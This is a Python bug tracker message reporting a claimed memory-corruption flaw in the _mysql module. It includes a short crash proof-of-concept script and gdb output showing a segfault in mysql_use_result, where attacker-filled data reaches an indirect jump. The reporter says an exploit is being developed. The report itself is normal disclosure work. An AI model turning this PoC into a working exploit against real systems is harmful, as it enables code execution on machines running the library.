Message 284629 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	zeroinside
Recipients	zeroinside
Date	2017-01-04.11:26:33
SpamBayes Score	-1.0
Marked as misclassified	Yes
Message-id	<1483529194.23.0.906683794217.issue29150@psf.upfronthosting.co.za>
In-reply-to

Content
Hello. I found a vulnerability in _mysql module. PoC below: #!/usr/bin/python2.7 import _mysql RDX=0x66666666 payload="A"2048 _mysql.result(payload,RDX) It's exploitable bug, I'm working on exploit. (gdb) run mysql.py Starting program: /usr/bin/python2.7 mysql.py [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18 (gdb) info reg rax 0x4141414141414141 4702111234474983745 rbx 0x7ffff7e91b90 140737352637328 rcx 0x0 0 rdx 0x66666666 1717986918 rsi 0x7ffff7eb1ec0 140737352769216 rdi 0x5555557f9890 93824995006608 rbp 0x7fffffffe120 0x7fffffffe120 rsp 0x7fffffffe0a8 0x7fffffffe0a8 r8 0x7fffffffdd00 140737488346368 r9 0x7fffffffdd80 140737488346496 r10 0x5555557824f0 93824994518256 r11 0x2 2 r12 0x5555557560a0 93824994336928 r13 0x0 0 r14 0x7ffff7e939c7 140737352645063 r15 0x7ffff7e91b90 140737352637328 rip 0x7ffff38e7f3c 0x7ffff38e7f3c <mysql_use_result+12> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) disas $rip Dump of assembler code for function mysql_use_result: 0x00007ffff38e7f30 <+0>: push %rbp 0x00007ffff38e7f31 <+1>: mov 0x4d0(%rdi),%rax 0x00007ffff38e7f38 <+8>: mov %rsp,%rbp 0x00007ffff38e7f3b <+11>: pop %rbp => 0x00007ffff38e7f3c <+12>: mov 0x18(%rax),%rax 0x00007ffff38e7f40 <+16>: jmpq %rax End of assembler dump. (gdb)

Hello.
I found a vulnerability in _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
RDX=0x66666666
payload="A"*2048
_mysql.result(payload,RDX)


It's exploitable bug, I'm working on exploit.
(gdb) run mysql.py 
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax            0x4141414141414141       4702111234474983745
rbx            0x7ffff7e91b90   140737352637328
rcx            0x0      0
rdx            0x66666666       1717986918
rsi            0x7ffff7eb1ec0   140737352769216
rdi            0x5555557f9890   93824995006608
rbp            0x7fffffffe120   0x7fffffffe120
rsp            0x7fffffffe0a8   0x7fffffffe0a8
r8             0x7fffffffdd00   140737488346368
r9             0x7fffffffdd80   140737488346496
r10            0x5555557824f0   93824994518256
r11            0x2      2
r12            0x5555557560a0   93824994336928
r13            0x0      0
r14            0x7ffff7e939c7   140737352645063
r15            0x7ffff7e91b90   140737352637328
rip            0x7ffff38e7f3c   0x7ffff38e7f3c <mysql_use_result+12>
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
   0x00007ffff38e7f30 <+0>:     push   %rbp
   0x00007ffff38e7f31 <+1>:     mov    0x4d0(%rdi),%rax
   0x00007ffff38e7f38 <+8>:     mov    %rsp,%rbp
   0x00007ffff38e7f3b <+11>:    pop    %rbp
=> 0x00007ffff38e7f3c <+12>:    mov    0x18(%rax),%rax
   0x00007ffff38e7f40 <+16>:    jmpq   *%rax
End of assembler dump.
(gdb)

History
Date	User	Action	Args
2017-01-04 11:26:34	zeroinside	set	recipients: + zeroinside
2017-01-04 11:26:34	zeroinside	set	messageid: <1483529194.23.0.906683794217.issue29150@psf.upfronthosting.co.za>
2017-01-04 11:26:34	zeroinside	link	issue29150 messages
2017-01-04 11:26:33	zeroinside	create